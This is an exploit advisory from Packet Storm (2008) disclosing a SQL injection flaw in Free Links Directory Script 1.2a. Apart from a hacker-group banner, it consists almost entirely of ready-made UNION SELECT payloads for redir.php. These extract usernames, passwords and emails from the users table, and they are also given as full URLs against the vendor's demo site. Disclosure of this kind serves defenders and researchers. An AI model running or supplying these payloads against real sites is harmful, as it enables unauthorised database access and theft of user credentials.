Free Links Directory Script 1.2a SQL Injection

2008-12-15T00:00:00
ID PACKETSTORM:73006
Type packetstorm
Reporter baltazar
Modified 2008-12-15T00:00:00

Description

                                        
                                            `################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #   
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #  
# --- Eliminator and to all members of darkc0de and ljuska.org# #  
################################################################   
#   
# Author: baltazar and sinner_01   
#   
# Home : www.darkc0de.com & ljuska.org  
#   
# Email : b4ltazar@gmail.com, sinn3r01@gmail.com  
#   
# Share the c0de!   
#   
################################################################   
#   
# App Name: Free Links Directory Script v1.2a  
#   
# App Home: http://flds-script.com/  
#   
# Dork: N/A   
#   
# POC: /redir.php?id=1+and+1=2+union+all+select+0,1,username,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# /redir.php?id=1+and+1=2+union+all+select+0,1,password,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# /redir.php?id=1+and+1=2+union+all+select+0,1,email,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# DEMO:  
# http://flds-script.com/demo/redir.php?id=1+and+1=2+union+all+select+0,1,username,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# http://flds-script.com/demo/redir.php?id=1+and+1=2+union+all+select+0,1,password,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# http://flds-script.com/demo/redir.php?id=1+and+1=2+union+all+select+0,1,email,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
#   
# Vuln Discovered 13/12/2008   
  
`